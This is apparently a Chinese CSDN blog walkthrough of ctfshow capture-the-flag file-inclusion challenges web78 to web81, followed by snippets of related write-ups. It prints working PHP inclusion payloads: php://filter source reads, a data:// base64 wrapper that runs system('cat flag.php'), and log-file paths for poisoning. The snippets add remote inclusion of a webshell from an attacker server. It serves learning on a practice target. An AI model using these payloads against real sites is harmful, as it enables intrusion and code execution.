showCTF 入门文件包含系列

最新推荐文章于 2025-05-30 10:18:13 发布
最新推荐文章于 2025-05-30 10:18:13 发布
阅读量444 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Hello_super/article/details/108703538
本文介绍如何使用PHP伪协议来读取并获取特定文件的内容,包括通过base64编码绕过限制的方法,以及针对不同服务器配置如nginx的日志文件包含技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  • web78
    读取源代码:
    在这里插入图片描述
    心想,就这?
    直接:http://url地址/?file=flag.php,但是这样出不来,页面什么也没有,想着这毕竟是一个PHP文件,可能在我们包含的时候被服务器给解析了。所以我们必须要让它不解析,这里提供一种方法,PHP伪协议中的:php://filter
    直接:
    http://url地址/?file=php://filter/read/convert.base64-encode/resource=flag.php
    成功获取flag.php的文件内容,在线网址解base64:
    https://tool.oschina.net/encrypt?type=3
    在这里插入图片描述
  • web79
    此题和也是利用PHP中的伪协议:
    ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=<-----base64-encode/decode-----> <?php system(‘cat flag.php’);

  • web80
    本题主要考察nginx服务器的日志文件包含,常见服务器日志文件位置:
    nginx: /var/log/nginx/access.log
    apache: /var/log/httpd/access_log
    bp拦截:
    在这里插入图片描述在这里插入图片描述在这里插入图片描述 - web81
    此题和80题是一样的方法。
ctfshow——文件包含
qq_55202378的博客
02-03 1213
这里不知道的文件路径,可以考虑使用尝试执行php语句,获取文件路径。 可能读取不了文件,这时候试试。linux 命令是倒序读取文件,也就是从最后一行往前读取文件。数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。用法: 架设外网服务器,使用远程包含自己服务器上的后门文件,即可获取webshell。php伪协议总结: 首先,根据php特性,无法迭代过滤,只过滤一次。此处,如果用替换,可以直接使用双写进行绕过。 架设外网服务器,使用远程包含自己服务器上的后门文件,即可获取webshell。既
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5509
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow 文件包含
Je3Z的博客
06-03 514
web78 ?file=data://text/plain,<?php system("cat flag.php");?> web 79 ?file=data://text/plain,<?= system("cat flag*");?> web80 hao 方法一:远程文件包含 往VPS下面写马,然后远程包含: ?file=http://118.***.***.***/1.txt 方法二:日志文件包含 ?file=/var/log/nginx/access.log 因此往U
[ctfshow web入门] web80 文件包含,关键字`php`和`data`过滤
最新发布
qq_50332504的博客
05-30 466
本文总结了两种绕过PHP文件包含防护的方法: 大小写绕过: 使用Php://input代替被过滤的php协议 通过POST发送PHP代码执行系统命令 需要工具使用raw模式发送数据 日志文件包含: 包含nginx访问日志文件 在User-Agent中注入PHP代码 通过日志文件执行系统命令 两种方法都成功绕过了对"php"和"data"关键词的过滤,最终获取了flag文件内容。文章还提到使用hackbar时需要注意模式选择问题。
ctfshow 文件包含
qq_53755216的博客
05-17 264
说明 从零开始学 主要为了学知识 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } php伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php php://filter 读取源代码并进行base64编码输出,不然会直接当做php
CTFSHOW—文件包含
灰太的表格的博客
02-04 677
web78 ?file=php://filter/convert.base64-encode/resource=flag.php web79 (php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码 使用方法:data://text/plain;base64,xxxx(base64编码后的数据)) php被过滤使用data伪装协议执行代码 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxh
CTFSHOW 文件包含
CyhDl666的博客
03-27 274
今天 复习一下文件包含漏洞 web 78 payload: ?file=php://filter/convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 这道题开始就有技巧了 源码 过滤了 php和data 伪协议用不了 if(isset($_GET['file'])){ .
ctfshow pwn4
qq_39980610的博客
08-22 807
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
2024sqlmap语句大全及解析,ctfshow201--213边做题边写笔记
2301_81133475的博客
08-09 2068
ctf.show官方paload给出以上脚本,复制成新的文件就行了,我用的是kali自带sqlmap在目录usr/share/sqlmap目录里的tamper目录下vim个ctf209.py,然后正常用。加入对'select' 的过滤,可以用upppercase这个脚本,但是sqlmap默认就是大写的SELECT 直接按照原来的命令也完全可以,但如果是正常操作的话在207命令后面改为。HTTP/1.1有7种请求方法:1、GET;:这里表名他改了,你可以用我207的方法,那样就不用找表列了,知道数据库就行。
ctfshow-WEB-web2_ctf
2401_84297618的博客
04-28 652
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号 a’ or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输。
CTFshow 反序列化 web264
Kradress的博客
02-11 1317
目录源码思路题解总结 源码 index.php <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 | # @message.php
ctfshow_文件包含
qq_45951598的博客
03-27 414
文章目录WEB78web79 WEB78 没什么好讲的 payload:?file=php://filter/read=convert.base64-encode/resource=falg.php web79 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__F
ctfshow文件包含
遇事不决冲冲冲
09-18 3419
web78 无防护读取源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 伪协议读取后base64解密 php://filter/read=convert.base64-encode/resource=flag.php web79 data协议 <?php if(isset($_GET['file
CTFSHOW-文件包含
m0_74606212的博客
03-24 570
CTFSHOW-文件包含
ctfshow-文件包含
m0_74456293的博客
03-27 679
ctfshow-文件包含
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值